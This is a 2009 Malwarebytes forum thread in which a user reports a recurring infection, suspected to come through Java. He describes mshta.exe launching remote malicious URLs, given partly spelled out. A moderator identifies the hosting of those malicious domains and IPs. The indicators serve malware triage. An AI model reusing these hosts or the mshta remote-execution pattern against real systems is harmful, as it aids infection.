Jump to content

Malwarebytes

uploaded infected.tar.gz

Started by duaneduane, May 04 2009 12:08 AM

3 replies to this topic

#1
duaneduane
Posted 04 May 2009 - 12:08 AM

    New Member

  • Members
  • Pip
  • 9 posts
Yesterday - visiting sites from reddit.com, using FF, Java took off and acted funny. Then IE pops up - and doh - I think the vector is via Java.

Malware bytes seemed to remove the problem, but re-infection appears to be happening.

I just uploaded (a) a hijack this log, and copies of odd files, that appear to be part of the infection. See the file "infected.tar.gz".

Then started to write this - and the virus has created new files... grrr....


I am a developer type, so I'll try to tell you some more.
Perhaps this is useful, or perhaps it will send you on a wild goose chase.

==========================================

I suspect the attack vector is JAVA - cause Java unexpectedly ran before the initial infection.

==========================================

Lastnight virus Program launched mshta.exe - pointing at these http sites:

sixty-six DOT fourty-eight DOT seventy-eight DOT two-two-two /ron/ronz.php?sid=&numpop=2&nid=1165670410&mid=8683822694&servern=

URL above is munged: spelled out numbers, DOTS are obvious

And:

Runs program: mshta.exe with command line argument:

Letter-S, Letter-R, Letter-V, DOT, Letter F, hyphen, Letter O, hypen, Letter R, DOT, ms, SLASH code SLASH srun

URL above is munged: spelled out server address, /code/run

And

klite DOT letter-A, Letter-T, Letter H DOT letter-C, Letter-X

Again, "munged" - spelled out middle word + DOT.

================================


-Duane.

#2
duaneduane
Posted 04 May 2009 - 12:10 AM

    New Member

  • Members
  • Pip
  • 9 posts
I should perhaps note that Malwarebytes - is *NOT* detecting these files....

-Duane.

#3
duaneduane
Posted 04 May 2009 - 12:28 AM

    New Member

  • Members
  • Pip
  • 9 posts
More files - that are being missed... - just uploaded.

-Duane.

#4
MysteryFCM
Posted 04 May 2009 - 03:22 AM

    Forum Deity

  • Moderators
  • PipPipPipPipPipPip
  • 4,233 posts
  • Gender:Male
  • Location:Tyneside, UK

View Postduaneduane, on May 4 2009, 01:08 AM, said:

sixty-six DOT fourty-eight DOT seventy-eight DOT two-two-two /ron/ronz.php?sid=&numpop=2&nid=1165670410&mid=8683822694&servern=

This is Verizon Business / MCI Communications Services;

http://hosts-file.net/?s=66.48.72.222

View Postduaneduane, on May 4 2009, 01:08 AM, said:

And:

Runs program: mshta.exe with command line argument:

Letter-S, Letter-R, Letter-V, DOT, Letter F, hyphen, Letter O, hypen, Letter R, DOT, ms, SLASH code SLASH srun

Hosted (surprise surprise) by Leaseweb (known to be crimeware friendly)

http://hosts-file.net/?s=85.17.162.100
http://hosts-file.net/?s=srv.f-o-r.ms

View Postduaneduane, on May 4 2009, 01:08 AM, said:

And

klite DOT letter-A, Letter-T, Letter H DOT letter-C, Letter-X

Also hosted at LeaseWeb

http://hosts-file.net/?s=klite.ath.cx
Steven Burn
Research Engineer

Posted Image

Follow us: Twitter, Become a fan: Facebook
Back to Newest Rogue Threats · Next Unread Topic →


1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users

  1. Malwarebytes Forum
  2. Research Center
  3. Newest Rogue Threats

Products

About

Partners

Follow Us